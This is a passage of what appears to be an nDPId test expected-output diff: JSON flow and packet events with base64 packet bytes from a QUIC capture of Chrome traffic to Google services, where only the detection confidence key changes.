jPGibxjk5vdFxY91t13JpZ9htdqGGMPDekPyxWc83i1LGMSQbz7QKh0X0aMz5ybK9\/HbZcAK3XSa0dobDV5b7WeSDsU\/3gkn5RaztmQfVs3owjzIYFbp5Buyz0Gxwz5Bi8HAJbB5BGGh\/yrQBy9y6a7q+P1hltskurz6iUjM71in38UzRyZojCOuaO6Q7QJeQvBcY+2qihs0FbDRsgigWTGzfjnSYa0tOUmlOdzI8uCwh7va3320+93h3I3V0faV6zxO50Au9kcqGGOEH12ZgVIt1bQdug2VBjCCj4ZbXJqLVuzhI96SplBcyo6UlwCnd09h5dMNn35qTkIiXou3NlcZ\/tYICl0xnfzAm0RxKz7INWJ+Pl4zSOjW44oFQwywPEE4MnpAbtWWGFRsesYIQtXXRapdS6Ha5rSylQcznied94Fdc28K\/TNM2dGosTNyEVqfCkfy1UU4pXqhmQ0m+rjS5SPefaGM\/ZPD3NALEgC7CILnzOB2B0di286grgHexJhCWlTHpcLt7yvnPnpvNTnwlX\/9e5CoKQXAkJPiDVcfLUGhluxsjbiqi4SZfvmdSRbJceWdtp0X6oS+wZzMuskEDHTOdTm8\/2jfc3WP
6WQlIPINuCYViTLdF00mSEreSp+37OaIb2Rx6SPPD3UtpXaQ+xXSYus1Cf40a6k\/5iqSZBv7Fz9wAvqxvY\/FEStzmAQOKL6neOcR\/iuiKWOf9tLN1utG9qzj06bkXuF4PkrZOphQj91RQVjRHJE\/j47Lin6DaH6C5JcxMyymH9ObgTVyLE1e0B+wF06i5Hpk0EmLRJrJjURxyuhfANLHsp16+JhydB5\/grGxYRU3dFEB9114XRsU\/tiaZ2R5k2S89FboGA44VEliJWQ+CTSwLe5S+N2Dr44vXPvjO\/3OWWI7JX"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1621489064732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489064732,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarFAAH4RWU6fdbB8xkodT8LLAbsFTjgfxP8AAB0IkZSau0whIqIAAEU0J8TFf9\/VN5o0lGBaCguQoO02OQJilvANZtDrj\/OMFT5vVNrKFd7OCVag8EJVYHP5drDglbbDTRTqEryYKQXDwAjbQHCb4hSrdiCPrBiKGUysqjHibjMf\/\/cJtlkKUYMzu1OQDuQUj+9BuGidWSQXbdrGH\/cTlKPd+fyN5rndTfsi2anhztAx+d2YTQRUUekRhlHuVJJ4p2Z3IZFTAhuPV73fTbf4SPuN0fx\/zwW0yXmcrqFwPIt2QCjrijow3wd+KpIs8aCUsVA3tkWMowGKkarLcQuMXYVO22n13\/qzcKOa3k5hzYmf35naphUVFnOiktJs5QiID0Mr11P7nKWISepE\/LKfN5G+AyBbHafEcuSLG+dEVP8yUlkvIWHaglmQ7qizy0zJczKmfUmQ4tB8PkdGBsyVJGxcLh46gJws33Dq2OBt0nxBR63wvgp7Iary4iOfw\/IHL3ToumCAV\/dXmL2kmNgOH8id2nU8Nu+pL\/mFyecOQcSlSIelxqEkydSXxEN6pMAyMNNzbwL5ZSVp2Z7kNaBMx8OxLxM3MyXiXBmtzik8FiHJRBWbOiVcg6x+N7mPue3jU\/huf1f0BbINQqN\/HNFCVwUhYAaElxDE6W\/blagPEW7I+SBFkQnuMpiIU5olOZc0CA8vEyBMs1tdVjOahUyHy8OFPfa4AFVAWJFtweZG3vHwtK+CpbCbe4cAXN1BRfmIH18rN1CiM\/ld5AcYMoezZxV7vyfKJwA1l7ujoHiWN9N\/jrpLAvyVeal7LCBIIi0GZ9vgIHand1Crz4BVQdwhxX\/b1KPjn6A0R2aF+8O+Jk4noYbodAKmJ20EQ4Io4xNA8Y2lH3XGlWsRmrg8HB\/uQwODFlv4Oe\/aBKhU93ernwhJ5dNzrCWsNwJ3ixca321IQXfRagDxTu5nq\/rHSlaGZ8XpC4aiF+vcEUNT+D7buWqgbnGXDaQOWeV3rk3WWi5Xd4DtoiE+O8dxPSi9YsxFNyD+D1Fehvnge1XsEICUGBX1oA1lskHJpGPRUbaLRmjcWs1Ytuy8V8zbWNuhpR2uEU5FpDzQ9GGTEimYVW60syM+GZGoskPJK6zwMlYqVKL\/UK2+O6rkjDClgzO14h8Z6S6YGxcY4LhXA72k3F5H8sKLJMFB83CXn2nMGIYAKuT65vFY41aaqklz9NsRxW1YBg0jNa3ymere9qj2lEhOIgrb7GB+XkUkMf0QieDkM8pJS
kzEXOFBLZfPAV3fLw3lZfe4s\/jN60uQMrcR88C9EnpOiOrBFZez0skinInExnzYEDkAtavtIsdoE71PRyR\/dHDCqzg7kZ18pLX6NjwVvyB1mlpdkMAVY1EdaRaeNmWPl40RA41HKTHrY+z6mtyrQLn5TgQXvZRMN76xUYz7ayMs5reGKxJhMrZqb6\/bIMRHi82Y4BJdVJJZgwj+sPhMg05o\/ukkRyzckGw\/OsW0tpPkLGLflVUuMWwcW3Yl7XXY9H4D+Gmk\/VQnSB5ldiKMcQlD5Nr524IdDK7HSP8PT17bN\/G71L8W4XQgg51GSgKjOUAB9S83oxZySOQTS0wV5NhNyS88WD5F0B8ngP\/B8chV5QevsF0LoPzzLZXg0AbR9bUfORgjfQ6jPb0UprPbX1e+36tDhCQ10Uh7j1e0kar55VVOgvNSJPW81uGBYWlpARxFyZgAbqvJ88OllqvEawT8k4\/1yAtxNXmYu6a0+vmPKpdv2NvRgtdznnjM6OaQG9AT9KHeWFinQcr3EhoXjjHZtcq2EfJF249Ule5A"} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1621489065332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489065332,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarJAAH4RWU2fdbB8xkodT8LLAbsFTtRNzv8AAB0IkZSau0whIqIAAEU0tHfQYGgiJ0EH+RA73c0S6Zaq1R3\/CGoDzOwk4Q2KioTg4BPcXvMoegRpbrqCRaxPmqcY6POupt419T5yZmEB9o7YSIZtOKX53fGHCoc+ZsrZdAJTsVl0w90+Thu9tqk+WfepCoo+8ilF8eq+j6cYmQaoShwWbEH8aZWTDkaSoT09anmUbwmDVwEeDWMR2gVSbwwmv8rsQebDMqWs7OSh8srBRRpctj4tlSjdyXtQ\/UgrcQwLwZyJ9bsybxKQkPWcl8u0HzyojquwKL+JbZxKDXk1Pg7nHqmE0nKgm9VkdPudXzUwchL1ul3yO2j+uSSY2ucW6GJUzkbRuqcP05vN5\/18Mzh2lL9RaX2a5vbWSDbJPjG6on5UXS4AETy2nWNq1houkm3\/LsJAcFW+eybNMQ\/Nfc0orOQRsfJQyw7lxDL1ruzcECMi7m7+OPIDmAbmjAnyDrsC8setxlXVl5I8lkK9C2ve4qxQY7LHppOIbgqzCnXt9B18rSw2ymRIIb8dQ+M\/fx31qrhwE34LRBtwaOzL55FerimrdvtRhPE\/mv7IoDWsrrCajTyJVFlMWr2531Fxhp0DlBKapCIN6irm6NF41QYx7pEPTpaVM2SwERSQzVfsZROIRwvaACW8\/+fvwocDLWcyiM5VOq9hyWHb9QLQTSulOzEVAVmrwaA2Wc5frvDv0rMsW9gHUGuvWJwN9Krts73QCPZYA\/f1SV1AyEmPiYreXLu3MGFoUmEo\/LyVkXE4N1kExgUBnVeYUIGJRQKjBWutqE8sov37uQgss39hXvDSnclvpRoBNdSz2aaNs3R6Aic7VKt8gbyykfOIBA3Buq8zDmawY8YFdP1SsTa6np4zbntI9f+oNNrBriSQ14fbXVlNMQrhk1OYGIYbeXglU4ZIOKm77PLC2GR7SRT
n1H4t2671bYr4eyrorlhGkzYuX1PeGMw\/j85u5uLrj61e2hEZJZD7r5x8MTQ1gOe4+Ph+Kz9X1vjFbsw9OmMDWkO65Ha+Cpf1ZHHApZ7QAuo5u2mG4Sp7g6rR1s5uclM6hCCnn2k2s8EDrb6RtHFjg3BneIS6SwSXyliDMHw0gO1PbIdSx1UUpSePV\/pCILKC\/M0H5LpPf\/59YwKN2B63+JAG1sL\/t2nutXsHIQzTGfUGp8q\/gu8\/oH2Pcsu\/oR96zl2VAWRwNCHmnnaZF9GJ22T7FDvnout2BFKs7xALVK\/GSWUrWW0DnJStDl6qSbXs+mlUPlFGuHBk4Eke31rEr4AxfQ2a\/9mZZog+0PD59WqfTjJ9R8bXy1KhNrHv56NiIqBiUw0rbG\/82hMaedg4sCu\/NdJjPtKJFvSXUMukKueAgyWcPj4sSLpvlA7iCI4ka\/RTTiki4Ye4QcJaaU15gJVIwcMMNnbkXWv\/HhOCwgK6cReevf96zzpUj1c84N8PWt9IEX6REFpHkIe9y3OvWTzdASwXJ9ovv1G9SjXfvrI7XedRdAxpB2vsQYi5gwEy3zTb3EFTDheiNc9y\/MCzHpVCklw85aHzUyvlzbZikqniVBAqAJensYNeu3p1TfbVsgAsy2eW\/hv+DDPc5Am8kV01z+FVZJbVWMPq0+tF6tPJo+fDG6\/w2\/eu949hx2pjfKmhp3d5IX0vfNEJhDKZIgmFV4d0I2S35UzYShoVcEpOEWvsBojm\/XwBtXsjwpE570c8CRHk7pLygTlIjRIrEQN0O6eP3A7nIZP\/sV9waxu2fmgOUmfKn8+KMxaVZv4SRaTB7ghieqbWD5Y61rshpqaP"} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621488172593,"flow_last_seen":1621488174706,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489066532,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621488172593,"flow_last_seen":1621488174706,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489066532,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":94,"packets-processed":93,"total-skipped-flows":0,"total-l4-payload-len":125550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":66,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":66,"total-idle-flows":65,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":296,"global_ts_msec":1621490937698} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1621490937698,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490937698,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDl1AAH4RTzw0uxSvdlnaLuMLAbsFThsNyv8AAB0Is32f4l9Pl3YAAEU0hQvFkzqCFRJrzdm+P7CepRPizYj8V5fWvrVXzVuBf2NRkl3eGWbs2YtmOjlr1x\/pBPc\/7TLqG34Khp0PMlFKcz3fdNeoXKYeyR\/Hs72zcRs4hnEn+4P6mPqm5uCsv8fDjYHuJRIAjvSHTbEdxqgFHEd93118utoyjtMgpgcEbs4fXoPb8uDAHM5T4MCKj6qQNjX6I7nNo6EuPNWQg9gu3uCawN9k7BQzQN6E5YfL1AdHh4udF7sZw+dow9sF\/laxj49FS3UXGVaahEsCE3aD2597p7TwOCMsaP9cpJ6+mt4daKLcDJnJAMt+icMAtT9fzWBRO4vYi5NQjh2DPs+GRWiTKh8dxvVzhRom8\/iF8KHgTJy3pWtXKlPeLfZAL3oZX5hiz2PB+HTVur2l5vjVWa6EpaFOaRykdvEuLIieDh5u0ZCT5hWtho28j2TyUwsZurEURzu6rl34H7da+I6rfvvL\/zNBXRl0T5rIEnMLL\/j4r9tphU2zm73BBkXS2V8NqavgjXhm8kqC3c5AZmhcVx3aPVo+42Q3ezUT39SUVKQVNHXmiaFVKiSaFUFlpUHrBUR8nGg2CAYm5iRBq\/qCatZ+wKK6Jor9Aelj+kTAnp5y3Y17HPQCp3A9e7GN\/AQvzanaLBchENACUbp6PsLPG0WwONlg5LquPMp39gYOflC9I0cMA9lanerY2UKd2DIvHrNxINIhafo64dTHQ2kruV+pvFVizjiYGEPTHm5vnjJ+vNgtO8FZ6Eymo8qJM5A2+vwe1kvg4nJxdm2E2Wn9X7T70nm++uQBCATbDwLy4YWKSHsoUqqJOZluOGYa1wXb4e+XDlmQzD44JyGBZoUrd+\/dh+KC7bZ6++qLMza7R\/lgjP\/l01SyMjsktR9TKWRx8l\/pSrp2aBkNYKphapPAf6rVSB6qqzYptEM4+9RgL5fiahM9zZLohrgrmNstzopEBbSjJHKT2BtkCePCTq9BXTY9wpytpKjLROzmBJcxKjOlKnF1g\/rktfgoVBF1SKnq6hR2PLzX3pKRc\/RptOGJ8gayhpr53uiIJElSTx+gWcAQGtbS9w40dA7UdV0kQrKTsOlEZPv4Wf1DZo6smp3gIVuDDknJHBV+79Kgv5HRfK28giV9WHGfmEktaajImtic0wa4l7nZNKYEOG\/CyBNl4UHMG4iNm+Y40wSoxegD3OA3LFE2Tr3WxLZaukNoA74zUcX2aqS0oIhr43+nrWk7rEOCNY9O2hGcdnBoVGgvgYX\/gYhzcOFnVXvBYg+04X1\/Lu6Je6ysBSIVyex9isvdPzkU7pOxMaiH3uzhIu6T+pp2pHExh+9q+rK10SAGliPxRu5zXtXE3Oy94SyfUjETd0qOQfmkHBz\/e9FYgFyyAkQn3MHd3fMmxpKxNsGPMBp\/cSG\/LANkIApGSvPXTwNw1vUedAoCnyCDwQXlWFtAwyohCNg2btp5ZVrwJqBGM7v
TCz+QiD2xs1qEthiBEr8j6ftBwGUP9P0OZX\/LFSLwiLgDLEHK\/768YbCSvzW3RfUSDD4sBnSpdyK4zahGcrI93nPJV2g2l0hHyyPgJ7X+z4BRD+aEuHW6lUHeG3Oj5Qh+Vsi8uKdlG0jwjTzMAg3f97PU4FGrQ+RjmPIPZIj9zzw+nTMrJSpqyIKsK7h2bGHuUUNWEUnH05Zth20+XAUcAWRC4suUp9EI8SZymgXxcd3IQ5KrKIi3GAnhHbFpy9beC1dCN5olmWNLOL3oSxQHzr7fvKwFtpOssY7Sag281T8O6Eak"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1621490938810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490938810,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDnRAAH4RTyU0uxSvdlnaLuMLAbsFThUFyP8AAB0Is32f4l9Pl3YAAEU0YOqdYTCCZZmk+g3+J22oWfx0doVS585v5dZuMcju6ceFUGjlxObU5iFwgva6ib0ak1Tmez5R8snBJP694+WPYbwvpl7HFaYBb32L02hySVgOT1FTMmvBo2Fo\/d5ANfZGxJNDQBrucO2wU26mhDDIiJWiWYLyLw+2wH9XtUY9hKwoMo3iFTjxOO1dnynX63OlfxLKWOPNDL\/CJlgdgaNXHQV7leuc3Xd6jzLAetIP1cBEVuqCfGK1Z\/PwWhV\/ilCFb3DMmIz+HaenysHXzEImv5aEb6mec8YzM\/GvxDGp1tCbktIjpAUlEhPRXGKZ8L0YQpyXKVC37At+Ncsh7AGMJvk0puDbiFW8meTwbKSAn\/sAaruKCEiN7ZpDtZ6AQjgTjJIChfbGSU8bd6+hfwBxOU5JZ5xFfQWmRvrx7dy8X8kvYMhYuvkFi3w9Ni2RFiXvTVu8VuiANv809cCo09xvlNkdw1DO\/WJmXRsdf1Y0IqaxV5KrebivhDDNQHtyrnyfrxQ5Y4ift5qmodWeoxdiidD7RJxvcyaRuheSGzXqxC4lIAiMQlrcqXvPnq3wegxcfrIRDEWEavybtNijaDhbp2eu65kvOP5wXZMNleDGBSxQdgktQpxL6TcHQlqLOjfCNHdixljqRof7DPO+5RBSaRguaP\/xe1GoZxspva5ZE9Xk+Xf3SmMHKKlPy59QkuWoIaGOiB7N7I1DAInixS\/jVOIySTOq4xF2KnvU1cEtEoyV42Mhr2KORjN9TpQKBy7JF6wcPKs2Pl3baeiEyYmSdleQIgMxFgrcHJCi21HOjSroXF4HIUsE2apsLaSuZKIs6JTyYJ6qUdjIGm424\/UHHh7fS4g4qA\/yUxx\/xBalncHIA4CjURBqXagq47c2XNGvnlFEquS6V7HZy9x27CFukTSbeIjgcRxXOAJzUlJ1yQ5t5JkOgB8oPDo7vO1NPT7iXgezGOshBG3qxRqw4FUz7pY+auLAGyFbA\/lsmtbgOLGTcFptcsDFuxveiIqXNb3fggSAG9Jq3G4TYmnIqNqka7HhL+stsx9khyR4A9gCtftmEfOrTTxMftEStlT5QLserQlCNp0N1XklnoOsNOcDxQty6hF3nIOhScEBVKysqeVEbi4UdZcUA64KdSVhoAaFJgUYzqosBYVtSdq6oVjC3rbAJ92pfW7W5fHOO\/Gzz4rjoa6QO0jRV4cCPZLQqvL7Whl8UxlUFbNLzMyEaywNzMDAb8u4
rh5j\/o9WJorChNDzH+7aC1pGc2DBqQhx+NA2UfbkgudimG0uOmYNVjS1IS1bDSwBdSH7GNbNFSEkwovorAkgGXCiJsNN1cNIzzCohUj5lfbIM4g5Mr+pCB40oATdPIus6Jzb2ASLd\/9Q3sKnYlXjoEthW4ZxmNASLbj3i11YfRdbW\/XSJmbOzbWEbGkTfP\/k6k8tNozfErQYaqQcQWy1XNJfDiRBXvvfoE3+y9U2kVEyp3L6AC1g\/JNMxiXgENUxOjpl9VPREmrP\/Rjthtz9gSXutw7+EZR3faEchxgczJKIbKwYHcJXGoSYCA8W3Hk3Zf+L+BJmdrRVHbtPRFqDPup8RvGlcW5Xzoa4vRRZbXHIKNQitatbh6+9\/gMI9RgLPzmaVU\/Vp8RntOXhKOwTec+\/5p5Qci1058hGbPEcEz9RH7ho4Uxp4mI0kI9Cy+wNwmwipQYYPfi742YDYxomWF7pzIij4vCMpGVsjxYg5gSAF5wb8qbS5fVF7UlGZOWJLoEHBgMVPUjuR95n2f0L"} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1621490940042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490940042,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEwhAAH4RoqY0uxSvedF+ofgTAbsFTmycyf8AAB0IX1A3NmSMbKUAAEU0Pg8s+OhkXllUqtMD1WTcO9yjUOzCG24snxvIngH7iX6ehFgoF1UYrfDy88XdHomQKlyLms0u9jlYkrqEodLauJRGapy4Hle2I8WKWHQL1rTKZH+tzK8ow8MeqFRrpbk8\/iokxoMoLXgVKCOwqLL7oRfGteGHJcbAGqvj5rPWn8lTHy\/nr7UNzD5DIeg4hTPlFVFboFc96\/ePrxRP6\/CWV2PQluHrHP+UDiuvF+\/WgxAU4Zaq\/s2euO20g4VMq4g6z0hkNtHxIuQ6G6ZlVXeT6uBX6ZPVEg0pfUhEvbGjqyM68S7s\/LuqkjtoK8zch\/4QBOjnMBjjSQwLMYWrIngHxIgbqBSyCkOJ+S+nMOeH0cA+0cnqBY4O49ufQhXDRjEGH5t5soDhhzS8sBGOiS03hbrWi+tm95qnkQ4EY7uhdczTXrlpbhNUdpcyH4wC71tfxfvQVS5y8IC1e8zT5BsHNYmBSU3cCiepaiVmZYJcGPmbBd0EWBl43HnBPIQ8CwCcoTjwgg26Yu4ozcj0BKQFUR0GMUF83l1lF8ot6wXFAA+oVj8seMzHzv2II23OXhbg44qPmITHSEYOmk8bA8y9XUBg7ALjZ36C005quDVZGN0J+Q44oR4tlRYPB94GZr5laHx3xI4zV2UfRy01CNaSkDMoeOEOMaeAi4kFgFipvCE1jwRUNvw9Vqe2+hR\/wsE+qJ\/zc31inDfEFutt+QNKxDy+c5v2szwudCf+3lADM5GAPJCWo+Nv3ArVcoU95DnZ8Qni4gFNPIas7CUUE3oqubppTtj9Kw2C\/6AvXyw4q7FUZBaXB5X4zjUqQWxcc20sJRmNfK46tma+3YZBWJZSVhtM4pRqEfs362IPwcZpvzz9KMT1frJPvZSyqCg5WxsuShHYKbtQca6juA82VMIw7n0mkTmMIQQq9Mj1AYJMVxWSFfEi9dTleToj9MJ1kk9djU0M9qoCSBeOLKZOaO7ZMQoI+LQb5AKLobDEPmCM\/+7vqosV0xxNb5\/8d22vjMPjhhUJQCLCU0zSX2v8r8IeoTWvGuTd36jZKvjkA9tWHYu73L8Z1+CH8Cei7yWoKXUBW3fDckkX+B50D9QGMtC\/RL4c6YIkI006jUdtSCby+AjkkzqsejzwjNaUTji4RgY8P93\/urJ7QidOPx7hxI6\/TCZFHC3NSWXM8bWJhPqBFEUJXD3S1Xr4e\/XJX4lmJ\/Ol5PgUeFwl29wp8pAoUmC4cRILuSnQY4l9xAdZlPqyDmbVu\/SSWy2Akqi5xJqxDVEON1HIuVfAYg1i119Yr7dWU5QplKsuqzsu4hfLJ6M8Yw5ZRJVC7RSE3r\/N0XrnFY73pQjDIXk9UmcxBojTmmq+gMcamIBeoL0S0ukwFhIcT6HHQfqlw0OzdXB1KL44BXZ9G2XIbRiRgnhcLeXH05qnfpT5pUwkVHt9m7ibHbmqRFCjXSOFgriLQZGqyYKgC+7
F70lj6Mklvy+ynXaGzESE6icJU\/STfU04WOE\/XjvOrRE8MvWUxGzhOBNeg4DukKHrJE7SlhswBlqxEdAUp1sFZsl\/6UVWCheylk3qxVcmo08I0V6U82TPQllNBHQQvLwa1Hz1qkNj0H98MIqjYsZiUPrT9PHl\/EubC5Mxf+rACdfBZZVOf7ZrGTAkVMqdQkNJ4KAoV4KyVWs727STfm\/XXQbuh+KdV53N3ZDf84eN9hHsz6Xg77mwy7PCShrWSrFEAyXWlin+he1NMoCnvMEs3ErNthA178U9LrQNGhrOQxjMONlj"} 